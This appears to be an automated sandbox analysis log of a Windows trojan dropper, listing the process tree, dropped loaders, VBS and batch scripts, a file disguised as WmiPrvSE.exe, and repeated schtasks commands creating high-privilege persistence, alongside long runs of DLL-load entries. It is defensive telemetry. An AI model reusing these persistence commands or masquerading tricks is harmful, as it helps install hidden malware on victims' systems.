            Source: 1.0. yberLoad.exe.4b2617.1.raw.unpack, cgYdKBS4dfIqsoQc3K5.cs Cryptographic APIs: 'TransformFinalBlock'
            Source: 1.0. yberLoad.exe.4b2617.1.raw.unpack, T0HDoS2uxaHqMCw3CHm.cs Cryptographic APIs: 'CreateDecryptor'
            Source: 0.3.4c6fK85tK7.exe.26e483f.0.raw.unpack, OsAeTLjTbLP5h5sZLNQ.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.3.4c6fK85tK7.exe.26e483f.0.raw.unpack, OsAeTLjTbLP5h5sZLNQ.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 1.3. yberLoad.exe.32cf3ab.1.raw.unpack, OsAeTLjTbLP5h5sZLNQ.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 1.3. yberLoad.exe.32cf3ab.1.raw.unpack, OsAeTLjTbLP5h5sZLNQ.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 1.0. yberLoad.exe.4b2617.1.raw.unpack, OsAeTLjTbLP5h5sZLNQ.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 1.0. yberLoad.exe.4b2617.1.raw.unpack, OsAeTLjTbLP5h5sZLNQ.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.0.4c6fK85tK7.exe.4c4e7f.3.raw.unpack, OsAeTLjTbLP5h5sZLNQ.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.0.4c6fK85tK7.exe.4c4e7f.3.raw.unpack, OsAeTLjTbLP5h5sZLNQ.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: classification engine Classification label: mal100.troj.evad.winEXE@60/26@1/1
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exe Code function: 3_2_00276EC9 GetLastError,FormatMessageW
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exe Code function: 3_2_00289E1C FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree
            Source: C:\msPortRefnetdhcp\componentWininto.exe File created: C:\Users\Default User\Downloads\WmiPrvSE.exe
            Source: C:\Users\Default\Downloads\WmiPrvSE.exe Mutant created: NULL
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7308:120:WilError_03
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7996:120:WilError_03
            Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:8044:120:WilError_03
            Source: C:\Users\Default\Downloads\WmiPrvSE.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\b0b377e1857613aef91ebe71eb29e3cd69a49a7d
            Source: C:\Users\user\Desktop\4c6fK85tK7.exe File created: C:\Users\user\AppData\Local\Temp\ yberLoad.exe
            Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\msPortRefnetdhcp\m6JlOKDKnmGOe6a.bat" "
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\msPortRefnetdhcp\file.vbs"
            Source: 4c6fK85tK7.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.94%
            Source: C:\msPortRefnetdhcp\componentWininto.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
            Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Users\Default\Downloads\WmiPrvSE.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\4c6fK85tK7.exe File read: C:\Users\user\Desktop\desktop.ini
            Source: C:\Users\user\Desktop\4c6fK85tK7.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: 4c6fK85tK7.exe ReversingLabs: Detection: 97%
            Source: 4c6fK85tK7.exe Virustotal: Detection: 84%
            Source: unknown Process created: C:\Users\user\Desktop\4c6fK85tK7.exe "C:\Users\user\Desktop\4c6fK85tK7.exe"
            Source: C:\Users\user\Desktop\4c6fK85tK7.exe Process created: C:\Users\user\AppData\Local\Temp\ yberLoad.exe "C:\Users\user\AppData\Local\Temp\ yberLoad.exe"
            Source: C:\Users\user\AppData\Local\Temp\ yberLoad.exe Process created: C:\Users\user\AppData\Local\Temp\MVPLoader.exe "C:\Users\user\AppData\Local\Temp\MVPLoader.exe"
            Source: C:\Users\user\AppData\Local\Temp\ yberLoad.exe Process created: C:\Users\user\AppData\Local\Temp\CyberLoader.exe "C:\Users\user\AppData\Local\Temp\CyberLoader.exe"
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\msPortRefnetdhcp\zRMFcMzN1094wnGdurNck4fGlt.vbe"
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\msPortRefnetdhcp\file.vbs"
            Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\msPortRefnetdhcp\m6JlOKDKnmGOe6a.bat" "
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\msPortRefnetdhcp\componentWininto.exe "C:\msPortRefnetdhcp\componentWininto.exe"
            Source: C:\msPortRefnetdhcp\componentWininto.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 9 /tr "'C:\Users\Default User\Downloads\WmiPrvSE.exe'" /f
            Source: C:\msPortRefnetdhcp\componentWininto.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Users\Default User\Downloads\WmiPrvSE.exe'" /rl HIGHEST /f
            Source: C:\msPortRefnetdhcp\componentWininto.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 11 /tr "'C:\Users\Default User\Downloads\WmiPrvSE.exe'" /rl HIGHEST /f
            Source: C:\msPortRefnetdhcp\componentWininto.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "zufsVvjyWcGfJFz" /sc MINUTE /mo 13 /tr "'C:\Recovery\zufsVvjyWcGfJF.exe'" /f
            Source: C:\msPortRefnetdhcp\componentWininto.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "zufsVvjyWcGfJF" /sc ONLOGON /tr "'C:\Recovery\zufsVvjyWcGfJF.exe'" /rl HIGHEST /f
            Source: C:\msPortRefnetdhcp\componentWininto.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "zufsVvjyWcGfJFz" /sc MINUTE /mo 14 /tr "'C:\Recovery\zufsVvjyWcGfJF.exe'" /rl HIGHEST /f
            Source: C:\msPortRefnetdhcp\componentWininto.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "zufsVvjyWcGfJFz" /sc MINUTE /mo 11 /tr "'C:\Windows\ShellComponents\zufsVvjyWcGfJF.exe'" /f
            Source: C:\msPortRefnetdhcp\componentWininto.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "zufsVvjyWcGfJF" /sc ONLOGON /tr "'C:\Windows\ShellComponents\zufsVvjyWcGfJF.exe'" /rl HIGHEST /f
            Source: C:\msPortRefnetdhcp\componentWininto.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "zufsVvjyWcGfJFz" /sc MINUTE /mo 6 /tr "'C:\Windows\ShellComponents\zufsVvjyWcGfJF.exe'" /rl HIGHEST /f
            Source: C:\msPortRefnetdhcp\componentWininto.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\EunsIO9tk2.bat"
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
            Source: unknown Process created: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exe C:\Windows\ShellComponents\zufsVvjyWcGfJF.exe
            Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\6eef2b35-f577-4ffd-aafd-9efeb85439f2.vbs"
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exe "C:\Windows\ShellComponents\zufsVvjyWcGfJF.exe"
            Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\da4d56e5-dd25-4b11-bec9-392111f2ec60.vbs"
            Source: C:\Windows\System32\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\wscript.exe Process created: C:\Users\Default\Downloads\WmiPrvSE.exe "C:\Users\Default User\Downloads\WmiPrvSE.exe"
            Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\e99985a1-94fc-4281-b02a-ceb1639f4b4a.vbs"
            Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\6334e2d8-afed-41d5-8a9a-b81dc662bd51.vbs"
            Source: C:\Windows\System32\wscript.exe Process created: C:\Users\Default\Downloads\WmiPrvSE.exe "C:\Users\Default User\Downloads\WmiPrvSE.exe"
            Source: C:\Users\Default\Downloads\WmiPrvSE.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\1ad27169-68a1-4284-b3a4-ab1d46640beb.vbs"
            Source: C:\Users\Default\Downloads\WmiPrvSE.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\d096c949-588b-4f62-9035-9022be100ad8.vbs"
            Source: C:\Windows\System32\wscript.exe Process created: C:\Users\Default\Downloads\WmiPrvSE.exe "C:\Users\Default User\Downloads\WmiPrvSE.exe"
            Source: C:\Users\Default\Downloads\WmiPrvSE.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\d365112d-c481-40f0-92bb-6621c11733c0.vbs"
            Source: C:\Users\Default\Downloads\WmiPrvSE.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\c327c276-7051-4e25-8eb9-181648a7a409.vbs"
            Source: C:\Windows\System32\wscript.exe Process created: C:\Users\Default\Downloads\WmiPrvSE.exe "C:\Users\Default User\Downloads\WmiPrvSE.exe"
            Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\Default\Downloads\WmiPrvSE.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\e99985a1-94fc-4281-b02a-ceb1639f4b4a.vbs"
            Source: C:\Users\Default\Downloads\WmiPrvSE.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\6334e2d8-afed-41d5-8a9a-b81dc662bd51.vbs"
            Source: C:\Users\Default\Downloads\WmiPrvSE.exe Process created: unknown unknown
            Source: C:\Users\user\Desktop\4c6fK85tK7.exe Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\4c6fK85tK7.exe Section loaded: shfolder.dll
            Source: C:\Users\user\Desktop\4c6fK85tK7.exe Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\4c6fK85tK7.exe Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\4c6fK85tK7.exe Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\4c6fK85tK7.exe Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\4c6fK85tK7.exe Section loaded: propsys.dll
            Source: C:\Users\user\Desktop\4c6fK85tK7.exe Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\4c6fK85tK7.exe Section loaded: windows.staterepositoryps.dll
            Source: C:\Users\user\Desktop\4c6fK85tK7.exe Section loaded: edputil.dll
            Source: C:\Users\user\Desktop\4c6fK85tK7.exe Section loaded: urlmon.dll
            Source: C:\Users\user\Desktop\4c6fK85tK7.exe Section loaded: iertutil.dll
            Source: C:\Users\user\Desktop\4c6fK85tK7.exe Section loaded: srvcli.dll
            Source: C:\Users\user\Desktop\4c6fK85tK7.exe Section loaded: netutils.dll
            Source: C:\Users\user\Desktop\4c6fK85tK7.exe Section loaded: sspicli.dll
            Source: C:\Users\user\Desktop\4c6fK85tK7.exe Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\4c6fK85tK7.exe Section loaded: appresolver.dll
            Source: C:\Users\user\Desktop\4c6fK85tK7.exe Section loaded: bcp47langs.dll
            Source: C:\Users\user\Desktop\4c6fK85tK7.exe Section loaded: slc.dll
            Source: C:\Users\user\Desktop\4c6fK85tK7.exe Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\4c6fK85tK7.exe Section loaded: sppc.dll
            Source: C:\Users\user\Desktop\4c6fK85tK7.exe Section loaded: onecorecommonproxystub.dll
            Source: C:\Users\user\Desktop\4c6fK85tK7.exe Section loaded: onecoreuapcommonproxystub.dll
            Source: C:\Users\user\AppData\Local\Temp\ yberLoad.exe Section loaded: apphelp.dll
            Source: C:\Users\user\AppData\Local\Temp\ yberLoad.exe Section loaded: shfolder.dll
            Source: C:\Users\user\AppData\Local\Temp\ yberLoad.exe Section loaded: windows.storage.dll
            Source: C:\Users\user\AppData\Local\Temp\ yberLoad.exe Section loaded: wldp.dll
            Source: C:\Users\user\AppData\Local\Temp\ yberLoad.exe Section loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Local\Temp\ yberLoad.exe Section loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Local\Temp\ yberLoad.exe Section loaded: propsys.dll
            Source: C:\Users\user\AppData\Local\Temp\ yberLoad.exe Section loaded: profapi.dll
            Source: C:\Users\user\AppData\Local\Temp\ yberLoad.exe Section loaded: windows.staterepositoryps.dll
            Source: C:\Users\user\AppData\Local\Temp\ yberLoad.exe Section loaded: edputil.dll
            Source: C:\Users\user\AppData\Local\Temp\ yberLoad.exe Section loaded: urlmon.dll
            Source: C:\Users\user\AppData\Local\Temp\ yberLoad.exe Section loaded: iertutil.dll
            Source: C:\Users\user\AppData\Local\Temp\ yberLoad.exe Section loaded: srvcli.dll
            Source: C:\Users\user\AppData\Local\Temp\ yberLoad.exe Section loaded: netutils.dll
            Source: C:\Users\user\AppData\Local\Temp\ yberLoad.exe Section loaded: sspicli.dll
            Source: C:\Users\user\AppData\Local\Temp\ yberLoad.exe Section loaded: wintypes.dll
            Source: C:\Users\user\AppData\Local\Temp\ yberLoad.exe Section loaded: appresolver.dll
            Source: C:\Users\user\AppData\Local\Temp\ yberLoad.exe Section loaded: bcp47langs.dll
            Source: C:\Users\user\AppData\Local\Temp\ yberLoad.exe Section loaded: slc.dll
            Source: C:\Users\user\AppData\Local\Temp\ yberLoad.exe Section loaded: userenv.dll
            Source: C:\Users\user\AppData\Local\Temp\ yberLoad.exe Section loaded: sppc.dll
            Source: C:\Users\user\AppData\Local\Temp\ yberLoad.exe Section loaded: onecorecommonproxystub.dll
            Source: C:\Users\user\AppData\Local\Temp\ yberLoad.exe Section loaded: onecoreuapcommonproxystub.dll
            Source: C:\Users\user\AppData\Local\Temp\MVPLoader.exe Section loaded: dwmapi.dll
            Source: C:\Users\user\AppData\Local\Temp\MVPLoader.exe Section loaded: file_selector_windows_plugin.dll
            Source: C:\Users\user\AppData\Local\Temp\MVPLoader.exe Section loaded: flutter_windows.dll
            Source: C:\Users\user\AppData\Local\Temp\MVPLoader.exe Section loaded: msvcp140.dll
            Source: C:\Users\user\AppData\Local\Temp\MVPLoader.exe Section loaded: vcruntime140_1.dll
            Source: C:\Users\user\AppData\Local\Temp\MVPLoader.exe Section loaded: vcruntime140.dll
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exe Section loaded: <pi-ms-win-core-synch-l1-2-0.dll
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exe Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exe Section loaded: <pi-ms-win-core-localization-l1-2-1.dll
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exe Section loaded: version.dll
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exe Section loaded: dxgidebug.dll
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exe Section loaded: sfc_os.dll
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exe Section loaded: sspicli.dll
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exe Section loaded: rsaenh.dll
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exe Section loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exe Section loaded: dwmapi.dll
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exe Section loaded: cryptbase.dll
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeSection loaded: policymanager.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeSection loaded: msvcp110_win.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeSection loaded: pcacli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeSection loaded: version.dllJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeSection loaded: wldp.dllJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeSection loaded: profapi.dllJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeSection loaded: amsi.dllJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeSection loaded: userenv.dllJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeSection loaded: edputil.dllJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeSection loaded: wbemcomn.dllJump to behavior
